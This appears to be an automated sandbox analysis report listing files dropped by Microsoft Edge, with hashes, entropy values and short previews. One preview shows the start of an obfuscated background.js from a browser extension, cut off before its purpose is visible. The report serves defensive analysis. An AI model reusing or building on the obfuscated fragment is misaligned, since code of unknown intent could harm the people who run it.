                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13357379679684250","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_l

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26125
                                                                                                                                          Entropy (8bit):5.551283102880555
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Ryh3dzkZWPGQfK18F1+UoAYDCx9Tuqh0VfUC9xbog/OV3mx9FrwipCtu9:Ryh3dIZWPGQfK1u1jamk9u7t2
                                                                                                                                          MD5:FEF3249E36256367F6608BD5C82A8DA3
                                                                                                                                          SHA1:385DFB3C5A4F741F9B657DB4FA39D8DD7B20B1AF
                                                                                                                                          SHA-256:6777C13C13B7E7596E4C4EF66C332A1B9FFA674BF10F2B0DCDE6DCA038CEA3E8
                                                                                                                                          SHA-512:788096DFE0072293FB6184FE2019C3381DF5401CA87619DAB9A5712471478489BD05D3A763FB99E2C45A971840631FE0417A51FD7AA0C346D78E435F39F52955
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13357379679150389","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13357379679150389","location":5,"ma

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3afb9.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26125
                                                                                                                                          Entropy (8bit):5.551283102880555
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Ryh3dzkZWPGQfK18F1+UoAYDCx9Tuqh0VfUC9xbog/OV3mx9FrwipCtu9:Ryh3dIZWPGQfK1u1jamk9u7t2
                                                                                                                                          MD5:FEF3249E36256367F6608BD5C82A8DA3
                                                                                                                                          SHA1:385DFB3C5A4F741F9B657DB4FA39D8DD7B20B1AF
                                                                                                                                          SHA-256:6777C13C13B7E7596E4C4EF66C332A1B9FFA674BF10F2B0DCDE6DCA038CEA3E8
                                                                                                                                          SHA-512:788096DFE0072293FB6184FE2019C3381DF5401CA87619DAB9A5712471478489BD05D3A763FB99E2C45A971840631FE0417A51FD7AA0C346D78E435F39F52955
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13357379679150389","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13357379679150389","location":5,"ma

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1011
                                                                                                                                          Entropy (8bit):5.8189211540037205
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:F2xc5NmicncmIZTZTXn3T8CTkGm6PLT0CTSoRgi8TXn3T8CTUpm6Pp:F2emLGNXj8EkGmmfS62Xj8E2mg
                                                                                                                                          MD5:FCE39C99126ADA0A52219883FABC9253
                                                                                                                                          SHA1:1B1CC880A1BD4D6F9B4D112A94B64C91DBB24033
                                                                                                                                          SHA-256:6AEBD68E1326F6222219BA71AD7158910313BED10CF58335A16F595D34220FB7
                                                                                                                                          SHA-512:0815CAE1B60EDF0EEDD23DF23274E3EDF34942852CA8B4108D3AEBB586C02FB37544BF94A4D9A1D13CFD856849B20CCDCE3CEA5D33876E87775CC0ADE91DB190
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.q.m.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.KINITDATA_UNIQUE_ORIGIN:chrome-extension://gallehngbfkeajggjpnehenkamehkmid/..:REG:chrome-extension://gallehngbfkeajggjpnehenkamehkmid/.0.....4chrome-extension://gallehngbfkeajggjpnehenkamehkmid/.Achrome-extension://gallehngbfkeajggjpnehenkamehkmid/background.js .(.0.8.......@...Z.b.....trueh.h..h..h..h..h..p.x........................REGID_TO_ORIGIN:04chrome-extension://gallehngbfkeajggjpnehenkamehkmid/..RES:0.0.....Achrome-extension://gallehngbfkeajggjpnehenkamehkmid/background.js...."@72FFA98A4D2E03D6982B3CD4327273F8FB8E810A755DCE8F68F85E84B9ECA890..URES:0..PRES:0..................:REG:chrome-extension://gallehngbfkeajggjpnehenkamehkmid/.0.....4chrome-extension://gallehngbfkeajggjpnehenkamehkmid/.Achrome-extension://gallehngbfkeajggjpnehenkamehkmid/background.js .(.0.8.......@...Z.b.....trueh.h..h..h..h..h..p.x...........

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):299
                                                                                                                                          Entropy (8bit):5.147354324399855
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:CMSR1923oH+TcwtE/a252KLlIQMCVq2P923oH+TcwtE/a2ZIFUv:CMrYeb8xLaQnVv4Yeb8J2FUv
                                                                                                                                          MD5:7F549A7C0F673F269B0C2034D3246C7F
                                                                                                                                          SHA1:CAD034D3A15B4D64FCEEAE0097306CD5B299C1F4
                                                                                                                                          SHA-256:651725276B032F1F68FD01957FAC1C409DBB6AFDAE84679282A208B1C6E9FAB1
                                                                                                                                          SHA-512:E5E80F947395A26A66C495651754C03A1ABDFB021F3BBAFD8727F34A68C7386FF17469A88493E3E01B4AF2EAFAACB9BAE15C5E47FE8E7F83255909B776CC09BE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:40.372 1f80 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/04/12-09:14:40.387 1f80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):41
                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):35831
                                                                                                                                          Entropy (8bit):5.409508483396066
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:KgnO8bwNKyvM9phVeWwWndXsYAkHZor0hZAbtPNLKoMThDyEF3nyJWaFe3pcLcfb:1n74eT1VROLRIlML581n
                                                                                                                                          MD5:D5F8D6FC6AA57EA66878DBFCC61E6E0A
                                                                                                                                          SHA1:391F261F506971439EA44C6CEAAB96DF47F9491F
                                                                                                                                          SHA-256:B3147C60FCE63AC4562804734794C30632C3C0A39A902DC605DBF4AE5670AE7D
                                                                                                                                          SHA-512:DBA0EE845092F1A14B42371710C7BA405E896B6DF84326A6C5583A12E50504D36091A2021CB015A0CB659706F2323B2397F5E5C164B5B0D30E8B6BDACB61815F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:0\r..m..........rSG.....0(function(_0x976af2,_0x46d10d){function _0x352f57(_0x2c46a8,_0x4efd25,_0x5c5a82,_0x48d698){return _0x1783(_0x2c46a8- -0x149,_0x4efd25);}function _0x5a0895(_0x5759ae,_0x55e103,_0x24b7b0,_0x550e55){return _0x1783(_0x550e55-0x212,_0x24b7b0);}const _0xfc41f7=_0x976af2();while(!![]){try{const _0x2e5a8d=parseInt(_0x352f57(-0x3a,-0x84,-0x6c,-0x3))/(0x1268+-0x1beb*0x1+-0xcb*-0xc)*(parseInt(_0x5a0895(0x306,0x2d8,0x2dc,0x2dd))/(-0x149a+-0x19d6+0x2e72))+-parseInt(_0x352f57(-0x15,-0x42,0x15,-0x17))/(0x26d8+0xa*-0xed+-0x1d93)+parseInt(_0x352f57(-0x96,-0xda,-0x48,-0x54))/(-0x353+0x4*-0x2a5+-0x1*-0xdeb)+-parseInt(_0x352f57(-0x98,-0xc6,-0xa0,-0xd4))/(-0x95*-0x1+0x1*0xe84+-0x3c5*0x4)+parseInt(_0x5a0895(0x2ca,0x32a,0x2b2,0x2f7))/(-0x7b7+-0x10de+0x189b)+-parseInt(_0x352f57(-0x62,-0x69,-0x27,-0x6c))/(0x99*0x1+0x16d1+0x1763*-0x1)*(-parseInt(_0x352f57(-0x82,-0x7c,-0x54,-0xbb))/(0x21a7*0x1+-0x2083+-0x11c))+-parseInt(_0x352f57(-0xa3,-0xcd,-0xb4,-0xfe))/(0xb8c+0x43e*-0x9+0x1aab)*(-pars

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):45489
                                                                                                                                          Entropy (8bit):5.8399372330126145
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:VdjsIt+A/emy1MqWPrYLjL7Ajlkj4W97H+:Ve+N/S1er0XAjz4z+
                                                                                                                                          MD5:4983DA3189D1F04A2F9CCED35D136869
                                                                                                                                          SHA1:2C2278751094FF20C122902755D048A79992FD9D
                                                                                                                                          SHA-256:FC1FFD68CF42B37375B784E7477526AF80B2D07D7E947F74A6F61C8751120904
                                                                                                                                          SHA-512:FC1418E79ACEBC609DA0F0757BA2C955057D1999EDA0E196DCAB53CF74E5C6432C8AC4438915675C2FD1F3EFE059A6FA4AD27E1B1B16641B56225882683098F2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:0\r..m..........rSG.....0....z3.................;.....x.X........,T.-...`.....dL`.....@L`.....,T.4.`&.....L`......Rc..2....._0x1783....Dg....(.......!......E4....c.......(Sb.............Rd.Z#m...._0x3136d9...`....Da....@....PSb.`............Rd.7L....._0x4dc1ce.....Rd..j....._0x373f18.....Rd..$l...._0x1dcc8f.....Rd........_0x4286fc.....Rd.X.?...._0x2554a2.....Rd.s......_0x3a6595...e........................Ib................b.........@...H......PQ.L...~A...chrome-extension://gallehngbfkeajggjpnehenkamehkmid/background.js...a........Db............D`........A.`V........,T....`.....$L`.....,T.4.`&.....L`.......Dg....(.......!......E.....c.......(Sb.............RdJg?....._0x352f57...`....Dab........(...b.........@...He.........................,T.4..`&.....L`........Dg....(.......!......E.....c.......(Sb.............Rd........_0x5a0895...`....Da4............b.........@...e..........................bV....N....N...Sb..............Rd...a...._0x3026ae...`.....`......Kd ...................D...

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):24
                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:m+l:m
                                                                                                                                          MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                          SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                          SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                          SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:0\r..m..................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):72
                                                                                                                                          Entropy (8bit):3.4820790904273955
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:c0PcFXTXl/l+///lxEXk/t4//nRKl:cZ+//YXs4//R+
                                                                                                                                          MD5:2E2D038340C2ECC4F23674400D16A880
                                                                                                                                          SHA1:7C58AE219C4FF4B9A8D6B44BC055552AA92A702C
                                                                                                                                          SHA-256:520897BB927748E84DEEED687E553A8BDF9E71278539D1CE910C24465D61418B
                                                                                                                                          SHA-512:D13054B250BD33536FEF77EC5783538096682C356A93F0FF50E4457090D040B81B9625F0D7731702633D12BF5FC066E0ABD07297AAA1D1EC8236146A5D0E6C48
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...i.a.oy retne.............>...........X....,<........>........6Owt/.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):72
                                                                                                                                          Entropy (8bit):3.4820790904273955
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:c0PcFXTXl/l+///lxEXk/t4//nRKl:cZ+//YXs4//R+
                                                                                                                                          MD5:2E2D038340C2ECC4F23674400D16A880
                                                                                                                                          SHA1:7C58AE219C4FF4B9A8D6B44BC055552AA92A702C
                                                                                                                                          SHA-256:520897BB927748E84DEEED687E553A8BDF9E71278539D1CE910C24465D61418B
                                                                                                                                          SHA-512:D13054B250BD33536FEF77EC5783538096682C356A93F0FF50E4457090D040B81B9625F0D7731702633D12BF5FC066E0ABD07297AAA1D1EC8236146A5D0E6C48
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...i.a.oy retne.............>...........X....,<........>........6Owt/.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3a4bd.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):72
                                                                                                                                          Entropy (8bit):3.4820790904273955
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:c0PcFXTXl/l+///lxEXk/t4//nRKl:cZ+//YXs4//R+
                                                                                                                                          MD5:2E2D038340C2ECC4F23674400D16A880
                                                                                                                                          SHA1:7C58AE219C4FF4B9A8D6B44BC055552AA92A702C
                                                                                                                                          SHA-256:520897BB927748E84DEEED687E553A8BDF9E71278539D1CE910C24465D61418B
                                                                                                                                          SHA-512:D13054B250BD33536FEF77EC5783538096682C356A93F0FF50E4457090D040B81B9625F0D7731702633D12BF5FC066E0ABD07297AAA1D1EC8236146A5D0E6C48
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...i.a.oy retne.............>...........X....,<........>........6Owt/.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):318
                                                                                                                                          Entropy (8bit):3.9651290908638432
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:S85aEFljljljljljljljljlvIllaV93HdxLzRzedUV:S+a8ljljljljljljljljlvIlcbYW
                                                                                                                                          MD5:8BD0330F0419D294B3143FA21243C200
                                                                                                                                          SHA1:46A6B918DD38124843C57AD23B63FF3E875F7522
                                                                                                                                          SHA-256:C0CC97B794284513C95E9BB840202AC3E21C9839305937DE334AFFFE815A83A9
                                                                                                                                          SHA-512:6144C785881214A9B57662DE2E7D8C1E6A48B2238E0857E917C05C1E9C99C0BF84A6E2116E89B79E496A9FF984D8900A38160D53B4A505D6699563D52847FD08
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................V;b................next-map-id.1.Cnamespace-ed4ba0f7_148f_431e_8496_6e4f8aeb305e-https://ntp.msn.com/.0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):324
                                                                                                                                          Entropy (8bit):5.073571265723263
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:CJ4Iq2P923oH+TcwtrQMxIFUt8NSuVZmw+NqekwO923oH+TcwtrQMFLJ:CJ4Iv4YebCFUt8NR/+NF5LYebtJ
                                                                                                                                          MD5:207E948C6C2BF440CAA999E1A1A1CC60
                                                                                                                                          SHA1:92B9214A0984568921898FD0432E62A83601EE90
                                                                                                                                          SHA-256:8FEE92C22C9346159D0A182BCEAF60EC84BB60B0D416FFFE5A522477F188032A
                                                                                                                                          SHA-512:BCDF560C5C216279EA0530F1DC9088EC7F4A453FFF476BAD3A1324E2FD3EAF61D78A7062B8E8C4AF9CAD952A633A91ACB12DF3A87A056DDEC55E5766067DBD11
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:40.384 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/04/12-09:14:40.385 1e30 Recovering log #3.2024/04/12-09:14:40.390 1e30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):324
                                                                                                                                          Entropy (8bit):5.073571265723263
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:CJ4Iq2P923oH+TcwtrQMxIFUt8NSuVZmw+NqekwO923oH+TcwtrQMFLJ:CJ4Iv4YebCFUt8NR/+NF5LYebtJ
                                                                                                                                          MD5:207E948C6C2BF440CAA999E1A1A1CC60
                                                                                                                                          SHA1:92B9214A0984568921898FD0432E62A83601EE90
                                                                                                                                          SHA-256:8FEE92C22C9346159D0A182BCEAF60EC84BB60B0D416FFFE5A522477F188032A
                                                                                                                                          SHA-512:BCDF560C5C216279EA0530F1DC9088EC7F4A453FFF476BAD3A1324E2FD3EAF61D78A7062B8E8C4AF9CAD952A633A91ACB12DF3A87A056DDEC55E5766067DBD11
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:40.384 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/04/12-09:14:40.385 1e30 Recovering log #3.2024/04/12-09:14:40.390 1e30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13357379681647682

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1443
                                                                                                                                          Entropy (8bit):3.828389829454479
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:3SYjE923cQyeYHpsAF4unx0JtLp3X2amEtG1ChqdlUjR8n3VQKkOAM4:3Saf3cQEHzFEjLp2FEkChulUjR8n2HOp
                                                                                                                                          MD5:DDBBFB57FDCD64B021462EFCB7EB73B5
                                                                                                                                          SHA1:F3406EFDAB6A5EA4556113D873A772DF3EE05E46
                                                                                                                                          SHA-256:9967C944E5246DD2E4D68509968B2095AEB77D9A740848BFA37B34F93FC6E1CA
                                                                                                                                          SHA-512:30C6B5FC721DA32C4205C32ECDFE0F3E736944D7F42CA505081F7EE16D9FC4BAA608692FDB8AF3B661215FE68A64628D8E3B192DC6400206C63488B2E0382502
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SNSS..........x..............x......"...x..............x..........x..........x..........x....!.....x..................................x...x1..,......x$...ed4ba0f7_148f_431e_8496_6e4f8aeb305e......x..........x.................x......x..........................x....................5..0......x&...{98952893-68FF-4A5D-A164-705C709ED3DB}........x..........x.............................x..............x........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........r.......r...................................... ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):352
                                                                                                                                          Entropy (8bit):5.13981698809888
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C18BOq2P923oH+Tcwt7Uh2ghZIFUt8N18AZmw+N18BkwO923oH+Tcwt7Uh2gnLJ:CWBOv4YebIhHh2FUt8NWA/+NWB5LYebs
                                                                                                                                          MD5:0061231D0134909D4049747BF5D6BF94
                                                                                                                                          SHA1:C8463B82A6C3C6C4C1F22A6664A0B85481F49DF5
                                                                                                                                          SHA-256:A6197A098E131B9AB40120CE0AF260C5C2082FBB6A3887463F6CCAA0EB8E4200
                                                                                                                                          SHA-512:8E74B1993CCBB946A742866BD196210CF8951C3ECCE5EEEBEA6DBE25B4A8B989AE0222AEEB92F20E89E1D3C5982906F21E80BCE7C6F4766092DBACD101B0D24E
                                                                                                                                          Malicious:false
